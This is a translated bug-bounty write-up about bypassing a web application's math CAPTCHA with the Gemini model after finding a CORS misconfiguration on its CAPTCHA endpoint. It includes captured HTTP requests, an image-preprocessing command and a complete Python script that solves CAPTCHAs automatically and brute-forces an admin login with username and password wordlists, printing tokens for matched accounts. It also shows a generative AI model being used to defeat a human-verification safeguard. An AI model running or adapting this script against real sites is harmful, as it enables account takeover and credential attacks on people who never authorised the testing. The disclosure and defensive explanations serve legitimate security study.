Using AI Models to Bypass CAPTCHAs

文化 | 2024-11-20 12:03 | South Korea


Bypassing a CAPTCHA with AI revealed an underlying vulnerability and exposed a critical flaw in the application's web security.

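Hi everyone, I'm ph-hitachi, a full-stack developer, DevOps engineer, and security researcher with experience in automation engineering and bug bounty automation. This year I have been exploring new attack vectors. My focus is on how modern tools and techniques work, and how attackers might abuse them.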

Introduction:

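With the rise of automation, AI-driven techniques have advanced significantly and are increasingly used in cybersecurity. Recently I came across a case where AI could be used to attack a system rather than protect it. This write-up explains in detail how an AI model, specifically a generative AI model, was used to bypass CAPTCHA protection and take over accounts in a web application.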

What is a CAPTCHA?

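CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is a widely used security mechanism. It protects online services from automated abuse such as brute-force attacks, credential stuffing, and bot activity.
A CAPTCHA challenge typically presents a task that is easy for humans but hard for bots, such as identifying objects in an image, reading distorted text, or solving a basic math problem.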

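The main purpose of a CAPTCHA is to stop automated scripts or bots from performing harmful actions, such as repeatedly trying username and password combinations until one works. However, a CAPTCHA is only an effective defense as long as it cannot be bypassed or solved automatically.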


Testing Overview

We tested the platform using a combination of manual techniques and automated tools. The process consisted of the following steps:

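1. Extract CAPTCHA images from the server.
2. Solve the CAPTCHA images automatically with an AI model.
3. Test the login page's resistance to brute force using a "Cluster Bomb" approach, which combines every username with every password.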
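The "Cluster Bomb" approach enumerates the Cartesian product of two wordlists, which the demo script implements with two nested loops. The sketch below shows the same enumeration with `itertools.product`. The function name `cluster_bomb` and the sample lists are illustrative only, and the ordering is only claimed to match the script's loops, not any particular tool.

```python
from itertools import product

def cluster_bomb(usernames, passwords):
    """Yield every (username, password) pair across both wordlists."""
    # product() advances the rightmost list fastest. That gives the same order as
    # nested loops: all passwords for the first username, then the next username.
    yield from product(usernames, passwords)

usernames = ["admin", "operator"]   # hypothetical wordlist entries
passwords = ["123456", "admin123"]  # hypothetical wordlist entries
for pair in cluster_bomb(usernames, passwords):
    print(pair)
print(len(usernames) * len(passwords))  # 4
```

The total number of attempts is always `len(usernames) * len(passwords)`. This is why the cost of this approach grows quickly with wordlist size.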

Vulnerability Discovery Walkthrough:

Step 1: Identifying a CORS misconfiguration on the CAPTCHA endpoint
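The first step in finding this vulnerability was testing the security of the {BASE_URL}/admin-web/captcha/show endpoint. During testing, I found that the endpoint had a CORS (Cross-Origin Resource Sharing) misconfiguration. It allowed unauthorized origins to access sensitive resources such as CAPTCHA images.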
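A server that reflects whatever `Origin` it receives, while also sending `Access-Control-Allow-Credentials: true`, effectively trusts every website. The sketch below contrasts that pattern with an allowlist check. It is framework-agnostic: the function names, `ALLOWED_ORIGINS`, and the `example.com` domain are hypothetical, and the target's actual server code is unknown.

```python
ALLOWED_ORIGINS = {"https://admin.example.com"}  # hypothetical trusted front-end origin

def vulnerable_cors_headers(origin):
    # Misconfigured pattern: reflect any Origin and also allow credentials,
    # so every website is treated as trusted.
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
    }

def strict_cors_headers(origin):
    # Vary: Origin stops shared caches from serving one origin's response to another.
    headers = {"Vary": "Origin"}
    # Only allowlisted origins receive CORS headers. For any other origin the
    # browser refuses to expose the response to the calling page.
    if origin in ALLOWED_ORIGINS:
        headers["Access-Control-Allow-Origin"] = origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers

print(vulnerable_cors_headers("http://attacker.com"))
print(strict_cors_headers("http://attacker.com"))
```

CORS headers are enforced by browsers only. They govern what a web page on another origin may read, and they do not stop a non-browser HTTP client from calling the endpoint directly.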
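I sent a simple HTTP request with an untrusted origin and was able to retrieve the CAPTCHA image with no server-side origin validation. The server echoed the attacker's Origin in Access-Control-Allow-Origin and also returned Access-Control-Allow-Credentials: true.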
POST /admin-web/captcha/show HTTP/2
Host: [redacted].com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: [redacted].com
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Origin: http://attacker.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

sysId=1000

HTTP/2 200 OK
Content-Type: application/json
Date: Tue, 01 Oct 2024 01:28:11 GMT
X-Trace-Id: i100,i101001a441232779d64e6f88ea3b2040cfb43a
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://attacker.com
Access-Control-Expose-Headers: Set-Cookie
Access-Control-Allow-Credentials: true
X-Cache: Miss from cloudfront

{"img":"/9j/4AAQSkZJRgABAgAAAQABAAD(truncated)...","key":"code_xxxxxxxxxxx"}
This exposed CAPTCHA image became the entry point for the attack, because it could be fetched and processed automatically.
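The response body carries two things: the CAPTCHA as a Base64 string in `img`, and a `key` that must be sent back later. The `/9j/` prefix is simply the Base64 encoding of the JPEG start-of-image bytes `FF D8 FF`. The sketch below extracts both values with the standard library. `parse_captcha_response` is a hypothetical helper name, and the JPEG check assumes the server always returns JPEG, as in the captured response.

```python
import base64
import json

def parse_captcha_response(body):
    """Split a JSON body of the form {"img": <base64>, "key": <str>} into image bytes and key."""
    data = json.loads(body)
    image_bytes = base64.b64decode(data["img"])
    # JPEG files begin with FF D8 FF; "/9j/" is how those bytes look in Base64.
    if not image_bytes.startswith(b"\xff\xd8\xff"):
        raise ValueError("img field does not contain a JPEG image")
    return image_bytes, data["key"]

# Synthetic example body (not real server output).
sample_img = base64.b64encode(b"\xff\xd8\xff\xe0" + bytes(12)).decode()
print(sample_img[:4])  # /9j/
image_bytes, key = parse_captcha_response(json.dumps({"img": sample_img, "key": "code_example"}))
print(len(image_bytes), key)  # 16 code_example
```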
Step 2: Testing the authentication flow
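After confirming the CAPTCHA exposure, the next step was to analyze the authentication flow. I tested the {BASE_URL}/admin-web/auth/authInfo endpoint, which validates user credentials. Every login request must include a username, a password, and the answer to the most recently issued CAPTCHA.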
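Once a request is sent, the server's response indicates whether the login succeeded. The request parameters are:
loginName: the username being tested in the brute-force attack.
loginPassword: the password being tested.
captchaCode: the CAPTCHA answer (e.g., if the CAPTCHA reads 6+3, captchaCode is 9).
captchaKey: the key returned by the initial CAPTCHA request.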
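`captchaKey` ties each login request to the specific challenge the server issued. The demo script requests a new CAPTCHA before every login attempt, which is consistent with keys being single-use. The sketch below shows how such a key-to-answer mapping *could* work on the server side. The `CaptchaStore` class, the `code_` key format, and the single-use policy are all assumptions for illustration, not the target's confirmed behavior.

```python
import random
import secrets

class CaptchaStore:
    """Hypothetical server-side model: each issued key maps to exactly one expected answer."""

    def __init__(self):
        self._answers = {}

    def issue(self):
        a, b = random.randint(1, 9), random.randint(1, 9)
        key = "code_" + secrets.token_hex(6)  # assumed key format
        self._answers[key] = str(a + b)
        # A real server would render this text into an image instead of returning it.
        return key, f"{a} + {b}"

    def verify(self, key, code):
        # pop() removes the key, so it is consumed whether or not the answer is right.
        expected = self._answers.pop(key, None)
        return expected is not None and secrets.compare_digest(expected, code)

store = CaptchaStore()
key, text = store.issue()
a, b = (int(n) for n in text.split(" + "))
print(store.verify(key, str(a + b)))  # True
print(store.verify(key, str(a + b)))  # False: the key was already consumed
```

Under this model, a stolen key and image are worth exactly one login attempt. This matches the script's pattern of fetching, solving, and submitting a fresh CAPTCHA for every username and password pair.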
Step 3: Solving the CAPTCHA with an AI model
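When I first tried solving the CAPTCHA with an AI model, the unprocessed CAPTCHA image produced wrong answers because of its poor quality. The CAPTCHA shows a simple math expression such as 6 + 4, but the AI misread it as a string of digits (e.g., "6743") instead of solving the expression.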
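To fix this, I applied image preprocessing to make the CAPTCHA clearer, which let the AI read it with 100% accuracy in my testing. The key was converting the image to black and white and sharpening it. I based this on the following command from https://mathieularose.com/decoding-captchas: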
$ convert captcha_image.png -gaussian-blur 0 -threshold 25% -paint 1 captcha_image-1.png
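Applying Gaussian blur, thresholding, and the paint operation sharpened the edges and reduced noise. This made the CAPTCHA much easier for the AI model to read.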
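Thresholding and the paint step can be illustrated without any imaging library. The sketch below works on a grayscale pixel grid (a list of rows of 0-255 values) and has no dependencies.

- `threshold` mirrors `-threshold 25%`: values above the cutoff become white and the rest become black.
- `mode_filter` is a rough stand-in for `-paint 1`, which replaces each pixel with the most frequent color in a small neighborhood.

Both function names are illustrative. The demo script does its thresholding with Pillow's `Image.point` instead, and uses different Pillow filters for smoothing.

```python
from collections import Counter

def threshold(pixels, percent=25):
    """Map each 0-255 grayscale value to black (0) or white (255)."""
    cutoff = 255 * percent / 100  # 25% of 255 is 63.75
    return [[255 if p > cutoff else 0 for p in row] for row in pixels]

def mode_filter(pixels):
    """Replace each pixel with the most common value in its 3x3 neighborhood (clipped at edges)."""
    height, width = len(pixels), len(pixels[0])
    result = []
    for y in range(height):
        row = []
        for x in range(width):
            window = [pixels[j][i]
                      for j in range(max(0, y - 1), min(height, y + 2))
                      for i in range(max(0, x - 1), min(width, x + 2))]
            row.append(Counter(window).most_common(1)[0][0])
        result.append(row)
    return result

print(threshold([[10, 64, 200]]))  # [[0, 255, 255]]
noisy = [[0, 0, 0], [0, 255, 0], [0, 0, 0]]
print(mode_filter(noisy))  # [[0, 0, 0], [0, 0, 0], [0, 0, 0]]: the isolated speck is removed
```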
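After preprocessing, the AI model consistently returned correct results and solved expressions such as 6 + 4 correctly. This step was essential for achieving high accuracy when automating the CAPTCHA solving.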
Step 4: Solving the CAPTCHA with a Python script
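With the CAPTCHA image fetched from the vulnerable endpoint and solved by the AI model, the next step was to automate the whole process with a script.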
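Step 5: Implementing the brute-force attack: using wordlists, brute-force the login endpoint, supplying the extracted CAPTCHA code and key with each request.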

Script Implementation Overview

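Step 1: Send the first HTTP request to get the CAPTCHA:
Send a POST request to /admin-web/captcha/show to get the CAPTCHA image (as a Base64-encoded string) and its corresponding key.
Step 2: Decode and process the image:
Decode the Base64 image data from the response and process it with the Pillow imaging library as described above. Then use the AI model to extract the text from the CAPTCHA image.
Step 3: Solve the CAPTCHA:
Parse the text returned by the AI model. If it represents a math problem (e.g., 6 + 4 = ?), evaluate the expression to get the CAPTCHA answer.
Step 4: Brute-force with a dictionary attack:
Send POST requests to /admin-web/auth/authInfo with different username and password combinations. Each request includes the CAPTCHA answer (captchaCode) and the CAPTCHA key (captchaKey, from Step 1).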
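Step 3 of this outline depends on turning the model's text into an answer. The demo script does this by running `eval()` on a regex match. The sketch below takes the same approach but avoids `eval` by mapping each operator symbol to a function from Python's `operator` module. Treating `x` and `×` as multiplication and rejecting non-exact division are assumptions about how such CAPTCHAs might be rendered; the original write-up does not state them.

```python
import operator
import re

# Assumed operator spellings; "x" and "×" are guesses at how multiplication might appear.
OPS = {"+": operator.add, "-": operator.sub, "*": operator.mul,
       "x": operator.mul, "×": operator.mul, "/": operator.floordiv}

EXPR = re.compile(r"(\d+)\s*([+\-*x×/])\s*(\d+)")

def solve_math_captcha(text):
    """Return the answer to the first 'a op b' found in the model's output, or None."""
    match = EXPR.search(text)
    if match is None:
        return None  # e.g. the model returned a bare digit string such as "6743"
    a, op, b = int(match.group(1)), match.group(2), int(match.group(3))
    if op == "/" and (b == 0 or a % b):
        return None  # only exact integer division is treated as a valid answer
    return str(OPS[op](a, b))

print(solve_math_captcha("6 + 4 = ?"))  # 10
print(solve_math_captcha("6743"))  # None
```

Returning `None` instead of guessing lets the caller skip the attempt and request a fresh CAPTCHA. The demo script follows the same skip-and-retry pattern when the model returns nothing.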
Demo script:
#!/usr/bin/env python3
import requests
import base64
from PIL import Image, ImageFilter
from io import BytesIO
import os
import re
import argparse
import time  # Import time for delay
from colorama import init, Fore, Style
from tqdm import tqdm  # Import tqdm for the real-time progress bar
from google.api_core.exceptions import ResourceExhausted  # Import the exception

# Initialize colorama
init(autoreset=True)

# Configure API key for Google Generative AI
import google.generativeai as genai
genai.configure(api_key=os.environ['GEMINI_API_KEY'])

# Define constants
BASE_URL = "https://[REDACTED].com"
CAPTCHA_URL = f"{BASE_URL}/admin-web/captcha/show"
AUTH_URL = f"{BASE_URL}/admin-web/auth/authInfo"
SYS_ID = "1000"  # System ID

RETRY_LIMIT = 5  # Set a retry limit for handling quota exhaustion

# Step 1: Send First HTTP Request to Get the Captcha
def get_captcha():
    payload = {'sysId': SYS_ID}
    response = requests.post(CAPTCHA_URL, headers={
        'Content-Type': 'application/x-www-form-urlencoded'
    }, data=payload)

    if response.status_code == 200:
        return response.json()
    else:
        raise Exception("Failed to retrieve CAPTCHA")

# Step 2: Decode the Image and apply blur, thresholding, edge enhancement and smoothing
def process_captcha(captcha_data):
    # Decode the base64 image
    image_data = base64.b64decode(captcha_data["img"])
    image_pil = Image.open(BytesIO(image_data))

    # Image Processing
    image_blurred = image_pil.filter(ImageFilter.GaussianBlur(0))  # No blur
    image_gray = image_blurred.convert("L")
    threshold_value = 64  # roughly 25% of 255, like "-threshold 25%"
    image_threshold = image_gray.point(lambda p: 255 if p > threshold_value else 0)

    # Optional: Enhance and smooth the image
    image_painted = image_threshold.filter(ImageFilter.EDGE_ENHANCE).filter(ImageFilter.SMOOTH)

    return image_painted

# Step 3: Solve the Captcha
def solve_captcha(image, retry_count=0):
    # Generate the content using the AI model
    prompt = "Extract the text from this image."
    model = genai.GenerativeModel(model_name="gemini-1.5-flash")

    try:
        response = model.generate_content([prompt, image])

        # Check if the response has candidates and extract the text
        if response.candidates and response.candidates[0].content.parts:
            generated_text = response.candidates[0].content.parts[0].text.strip()  # Extract the text
            return generated_text
        else:
            # candidates is a list: report the first candidate's finish reason,
            # or the prompt feedback when no candidate was returned at all
            reason = response.candidates[0].finish_reason if response.candidates else response.prompt_feedback
            print(f"\n{Fore.RED}Error: CAPTCHA solving was not successful for reason: {reason}")
            return None
    except ResourceExhausted as e:
        # Handle resource exhaustion by retrying with a delay
        if retry_count < RETRY_LIMIT:
            print(f"\n{Fore.RED}Quota exceeded. Retrying in 30 seconds... (Attempt {retry_count + 1}/{RETRY_LIMIT})")
            time.sleep(30)  # Wait for 30 seconds before retrying
            return solve_captcha(image, retry_count + 1)
        else:
            print(f"\n{Fore.RED}Quota exhausted and retry limit reached. Exiting.")
            exit(1)
    except AttributeError as e:
        # Handle attribute error in case of incorrect response fields
        print(f"\n{Fore.RED}AttributeError: Possibly incorrect field in the response. Check for proper API handling.")
        print(f"\nError details: {e}")
        return None

# Evaluate a math expression (the caller's regex limits input to "digits operator digits")
def evaluate_math_expression(expression):
    try:
        result = eval(expression)
        return str(result)
    except Exception as e:
        print(f"\nError evaluating expression: {e}")
        return None

# Step 4: Use a Cluster Bomb Attack with Wordlist
def brute_force_login(username, password, attempt_count, total_attempts, progress_bar):
    # Get a new CAPTCHA for every login attempt
    captcha_data = get_captcha()
    captcha_image = process_captcha(captcha_data)
    captcha_text = solve_captcha(captcha_image)

    # Check if the CAPTCHA was successfully solved
    if captcha_text is None:
        print(f"\n{Fore.RED}Failed to solve CAPTCHA. Skipping this attempt.")
        return  # Skip this login attempt

    # Find the math expression in the text
    math_expression = re.search(r'(\d+\s*[\+\-\*\/]\s*\d+)', captcha_text)

    if math_expression:
        captcha_code = evaluate_math_expression(math_expression.group(0))
        captcha_key = captcha_data["key"]

        # Construct the payload for login attempt
        payload = {
            'loginName': username,
            'loginPassword': password,
            'sysId': SYS_ID,
            'captchaCode': captcha_code,
            'captchaKey': captcha_key,
            'loginVersion': 'v5',
            'noTgAuth': 'v1'
        }

        # Make the login attempt request
        response = requests.post(AUTH_URL, headers={
            'Content-Type': 'application/x-www-form-urlencoded'
        }, data=payload)

        response_json = response.json()

        # Only print success messages (when the response content is greater than 2000 bytes)
        if len(response.content) > 2000:
            tag = Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] "
            tqdm.write(tag + Fore.GREEN + f"TraceID: {Fore.YELLOW}{response_json.get('traceId', 'N/A')}")
            tqdm.write(tag + Fore.GREEN + "Credentials match:")
            tqdm.write(tag + Fore.YELLOW + f"Username: {Fore.GREEN}{username}")
            tqdm.write(tag + Fore.YELLOW + f"Password: {Fore.GREEN}{password}")
            tqdm.write(tag + Fore.YELLOW + f"Captcha Content: {Fore.GREEN}{math_expression.group(0)}")
            tqdm.write(tag + Fore.YELLOW + f"Captcha Code: {Fore.GREEN}{captcha_code}")
            tqdm.write(tag + Fore.YELLOW + f"Captcha Key: {Fore.GREEN}{captcha_key}")
            tqdm.write(tag + Fore.GREEN + "User Information:")
            user = response_json['data']
            tqdm.write(tag + Fore.YELLOW + f"Merchant ID: {Fore.GREEN}{user.get('merId', 'N/A')}")
            tqdm.write(tag + Fore.YELLOW + f"User Name: {Fore.GREEN}{user.get('loginName', 'N/A')}")
            tqdm.write(tag + Fore.YELLOW + f"User ID: {Fore.GREEN}{user.get('userId', 'N/A')}")
            tqdm.write(tag + Fore.YELLOW + f"Role ID: {Fore.GREEN}{user.get('roleId', 'N/A')}")
            tqdm.write(tag + Fore.YELLOW + f"X-Token: {Fore.GREEN}{user.get('token', 'N/A')}")

            return response_json

    # Update progress bar for failed attempts (without printing the failure message)
    progress_bar.update(1)

    # Introduce delay between each brute force attempt to avoid overloading the API
    # time.sleep(REQUEST_DELAY)

# Load usernames or passwords from a file
def load_wordlist(file_path):
    with open(file_path, 'r') as file:
        return [line.strip() for line in file.readlines()]

# Main execution
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Brute force login script with CAPTCHA solving.')
    parser.add_argument('--username', required=True, help='Path to the file containing usernames (one per line) or a single username string.')
    parser.add_argument('--password', required=True, help='Path to the file containing passwords (one per line) or a single password string.')

    args = parser.parse_args()

    # Load username and password wordlists or single strings
    username_list = load_wordlist(args.username) if os.path.isfile(args.username) else [args.username]
    password_list = load_wordlist(args.password) if os.path.isfile(args.password) else [args.password]

    total_attempts = len(username_list) * len(password_list)
    attempt_count = 0

    # Initialize progress bar
    with tqdm(total=total_attempts, desc="Brute Force Attack", ncols=100, ascii=True, colour="yellow") as progress_bar:
        # Perform brute-force login attempts
        for username in username_list:
            for password in password_list:
                brute_force_login(username, password, attempt_count, total_attempts, progress_bar)
                attempt_count += 1
Translated and compiled by 白帽子左一. Original article: https://infosecwriteups.com/utilizing-ai-model-for-hacking-bypassing-captchas-using-ai-leads-to-account-takeover-bug-bounty-028804b779a0

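Disclaimer: The techniques, ideas, and tools in this article are provided only for security-focused learning and discussion. No one may use them for illegal or profit-making purposes, and anyone who does bears sole responsibility for the consequences. All penetration testing requires prior authorization.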
